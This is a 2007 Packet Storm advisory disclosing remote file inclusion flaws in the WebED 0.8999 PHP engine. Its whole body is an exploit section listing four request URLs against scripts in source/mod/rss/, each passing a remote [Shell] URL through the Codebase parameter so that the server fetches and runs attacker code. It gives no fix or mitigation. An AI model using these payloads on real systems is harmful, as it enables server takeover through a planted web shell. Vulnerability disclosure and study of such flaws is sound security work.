webed-rfi.txt

2007-09-21T00:00:00
ID PACKETSTORM:59487
Type packetstorm
Reporter Seph1roth
Modified 2007-09-21T00:00:00

Description

                                        
                                            `---------------------------------------------------------------  
  
Multiple Remote File Inclusion Vulnerability  
  
---------------------------------------------------------------  
  
# Founded by : Seph1roth   
  
# Download Script: http://sourceforge.net/projects/ed-engine/ WebED-0.8999.tar.gz  
  
# Exploit:  
  
# http://[target]/[path]/source/mod/rss/channeledit.php?Codebase=[Shell]  
  
# http://[target]/[path]/source/mod/rss/post.php?Codebase=[Shell]  
  
# http://[target]/[path]/source/mod/rss/view.php?Codebase=[Shell]  
  
# http://[target]/[path]/source/mod/rss/viewitem.php?Codebase=[Shell]  
  
---------------------------------------------------------------  
`